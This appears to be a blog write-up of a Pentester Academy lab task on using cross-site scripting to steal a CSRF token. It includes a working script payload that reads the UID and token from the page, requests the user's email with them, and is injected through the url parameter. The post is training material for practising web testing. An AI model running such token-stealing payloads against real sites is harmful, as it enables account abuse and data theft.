Javascript for Pentester Task 17

Hello Pentesters, today I am going to post another solution to a task from Javascript for Pentester at Pentester Academy. This task is the same as task 16 in its setup. In this task, we learn how to find and work with CSRF tokens. CSRF tokens are used to mitigate cross-site request forgery, but they can be bypassed if they are not used properly. You can view solutions to the other tasks here.

Task 17: CSRF Token Stealing | TASK LINK

The task is to find the email address of UID=986 using an XSS vulnerability on the page. The request must carry the CSRF token, whose value at the time of writing was 8675699351612121977981321312312123123126554427773; the token is generated randomly, so you cannot predict its value or its entropy. This task is also of moderate difficulty: you need to know the XMLHttpRequest API, its syntax and how to use it.
Solution:
The injection point is the same as in the previous task: the url parameter. You can apply some injections to verify that too. While viewing the source code you will see this comment, which may have been written by the developer: “ Email can be obtained via a GET request to /lab/webapp/jfp/17/email with params uid=XXX where XXX is the user id you will have to find dynamically using the XSS and anything else you might need? csrf_token ?:) ”. So in this task, we have to find the UID and the CSRF token value dynamically.

<script>
  // The page renders the UID and the CSRF token inside elements with
  // ids 'uid' and 'csrf', formatted as "label:value", so split on ':'
  // and take the part after the colon.
  var uid = document.getElementById('uid').innerHTML;
  var uidarr = uid.split(":");
  var token = document.getElementById('csrf').innerHTML;
  var tokenarr = token.split(":");

  // Issue the GET request named in the developer's comment, passing the
  // UID and the CSRF token we just read from the DOM.
  var req = new XMLHttpRequest();
  req.onreadystatechange = function(){
    // readyState 4 means the response is complete; write its body into
    // the div with id 'result' so it is visible on the page.
    if (this.readyState == 4 && this.status == 200)
    {
      var data = this.responseText;
      document.getElementById('result').innerHTML = data;
    }
  };
  req.open('GET','http://pentesteracademylab.appspot.com/lab/webapp/jfp/17/email?uid='+uidarr[1]+'&csrf_token='+tokenarr[1],true);
  req.send();
</script>

The developer makes our task simpler by giving the UID and CSRF token elements descriptive ids, so we only have to grab those two values and put them into our XMLHttpRequest. We then send that request to the URL from the comment, retrieve the response as text and write it into the div with id="result". Copy and URL-encode the code and paste it after the url parameter on the same page.
Refer to this post as a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions provided on the Pentester Academy website.